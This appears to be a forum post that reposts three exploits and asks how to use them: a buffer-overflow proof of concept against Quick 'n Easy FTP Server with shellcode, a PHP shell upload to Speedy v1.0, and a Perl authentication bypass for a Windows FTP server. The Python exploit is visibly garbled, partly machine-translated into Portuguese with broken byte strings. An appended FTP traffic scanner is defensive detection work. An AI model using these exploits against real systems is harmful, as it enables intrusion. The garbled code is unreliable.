Hello everyone, I found these exploits and came to share them with you. At the same time, I am asking for your help in understanding how to configure and use them, since I don't have much knowledge.
Vulnerable systems:
* Quick 'n Easy FTP Server versions
Exploit:
#!/usr/bin/python
# Quick 'n Easy FTP Server 3.0 (LIST) 0day PoC exploit
# Proof of Concept: execute calc.exe
# Tested on 2000 SP0 Polish
# Bug found by H07
# Date: 18.07.2006
de importação socket *
host = "127.0.0.1"
port = 21
user = " H07 "
password = "open"
adr1 0x01ABED9A # ~ = Endereço do shellcode
adr2 = 0x7FFDF020 # ponteiro RtlEnterCriticalSection
shellcode = (
# bad chars: 0x00 0x0D 0x0A 0x5c 0x2F
# PEB block reconstruction
# mov edx, dword 0x7FFDF020 ; EDX <- RtlEnterCriticalSection pointer
# mov dword [edx], 0x77F8AA4C ; RtlEnterCriticalSection pointer <- original value
#...
\ " Xba \ x20 \ xf0 \ xfd \ x7f \ xc7 \ x02 \ x4c \ xaa \ xf8 \ x77 "
"\ x33 \ xC0 \ x50 \ X68 \ X63 \ x61 \ \ x6C X63 \ x54 \ x5B \ x50 \ x53 \ xB9 "
\ " XAD \ xaa \ x01 \ x78 "# Endereço do system () função ( polonês SP0 2000 )
"\ \ xFF XD1 \ XEB \ xF7 ")
intel_order def ( i):
a = chr ( i% 256)
i = i> > 8
b = chr ( i% 256)
i = i> > 8
c = chr ( i% 256)
i = i> > 8
d = chr ( i% 256)
str = "% c % c % c % c " % (a , b, c, d)
str retorno
s = socket ( AF_INET, SOCK_STREAM)
s.connect ( (host , port) )
s.recv impressão ( 1024)
s.send (" usuário% s \ r \ n " % (user) )
s.recv impressão ( 1024)
s.send ( "pass % s \ r \ n " % (password) )
s.recv impressão ( 1024)
buffer = "Lista "
buffer + = "?"
buffer + = "* A " 267
+ buffer = intel_order ( adr1 )
+ buffer = intel_order ( adr2 )
# EDX <- adr2 (RtlEnterCriticalSection pointer)
# ECX <- adr1 (shellcode address)
# MOV DWORD PTR DS: [ EDX ], ECX (overwrite the RtlEnterCriticalSection pointer)
# MOV DWORD PTR DS: [ ECX 4 ], EDX (exception and jump to shellcode)
buffer + = \ " X90 " shellcode * 300 +
+ buffer = "\ n \ r "
s.send (buffer)
s.recv impressão ( 1024)
s.close ()
__________________________________________________ ________________________
Speedy v1.0 Remote Shell Upload Vulnerability
# Author: ViRuS Qalaa
# Email: h1g@hotmail.it
# Tested on: Windows
# Team hacker:ViRuS Qalaa & HaCkEr aRaR & ViRuS KSA>>>X-MaN HaCk3r TeaM
:::::::::::::::::::::::::
=================Exploit=================
DorK:No DorK In MY Exploit
First Upload your shell.php.gif on The Script Speedy 1,0
----exploit----
I will show you the direct download link list in your browser and enjoy Blcl
your link shell like
http://{localhost}/{path}/uploads/Speedy_7296144526.gif
__________________________________________________ __________________________________________________ ____________
Windows FTP Server Exploit
# Title: WINDOWS FTP SERVER by DWG (Auth Bypass)
# EDB-ID: 12119
# CVE-ID: ()
# OSVDB-ID: ()
# Author: chap0
# Published: 2010-04-09
# Verified: yes
# Exploit Title: WINDOWS FTP SERVER by DWG (Auth Bypass)
# Date: April 09, 2010
# Version: v 1.4
# Tested on: Windows XP SP3
# Author: chap0
# Email: chap0x90[at]gmail[dot]com
#
# Windows FTP Server by DWG Software is vulnerable to
# authentication-bypass that will allow attackers to
# connect with any username and password.
# This give attackers full access to the Top Level
# directory of the ftp server.
#
# Greetz and many thanks to all Exploit-DBers and GOD gets the Glory
#
#
#!/usr/bin/perl
use IO::Socket;
$luser = "evil";
$pass = "hacker";
$mysock = IO::Socket::INET->new(PeerAddr =>'192.168.2.6', PeerPort => '21', Proto => 'tcp');
print "Connecting with a bad credentials. . .\n";
sleep(1);
print $mysock "USER $luser\r\n";
print $mysock "PASS $pass\r\n";
print "Making HACKED folder . . .\n";
sleep(2);
print $mysock "MKD HACKED\r\n";
print "DONE . . .\n";
sleep(1);
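
Added example, not part of the original post or of any of the quoted advisories: a defensive check for the FTP control channel that flags the kind of malformed LIST line the Quick 'n Easy FTP Server PoC above sends (an oversized argument carrying raw bytes and a long run of 0x90). The 256-byte limit, the function names and the sample traffic are assumptions constructed for illustration.

```python
import re

MAX_ARG_LEN = 256                      # assumed policy limit, not from any RFC
NOP_RUN = re.compile(rb"\x90{16,}")    # long run of x86 NOP bytes

def inspect_ftp_line(line: bytes) -> list:
    """Return the reasons one FTP command line (without CR/LF) looks hostile."""
    _verb, _, arg = line.partition(b" ")
    reasons = []
    if len(arg) > MAX_ARG_LEN:
        reasons.append("argument too long")
    try:
        text = arg.decode("utf-8")     # RFC 2640 pathnames are UTF-8
        if any(ord(ch) < 0x20 or ord(ch) == 0x7F for ch in text):
            reasons.append("control characters in argument")
    except UnicodeDecodeError:
        reasons.append("argument is not valid UTF-8")
    if NOP_RUN.search(arg):
        reasons.append("long run of 0x90 bytes")
    return reasons

def scan_stream(data: bytes) -> list:
    """Split captured client-to-server bytes into lines and collect alerts."""
    alerts = []
    for raw in data.split(b"\n"):
        line = raw.strip(b"\r")        # tolerate both CRLF and reversed LF CR
        if not line:
            continue
        reasons = inspect_ftp_line(line)
        if reasons:
            verb = line.split(b" ", 1)[0].decode("ascii", "replace").upper()
            alerts.append((verb, reasons))
    return alerts

# Constructed sample traffic: three normal commands, then a LIST line with the
# same shape as the PoC buffer (filler, 8 placeholder bytes, 0x90 run).
# No shellcode or real addresses are included.
SAMPLE = (
    b"USER anonymous\r\n"
    b"PASS guest@example.test\r\n"
    b"LIST -la /pub\r\n"
    b"LIST ?" + b"A" * 267 + b"\xde\xad\xbe\xef" * 2 + b"\x90" * 300 + b"\r\n"
)

if __name__ == "__main__":
    for verb, reasons in scan_stream(SAMPLE):
        print(verb, "->", "; ".join(reasons))
```

The same checks can run in an FTP-aware proxy or over a packet capture; dropping the line before it reaches the server is what protects an unpatched daemon.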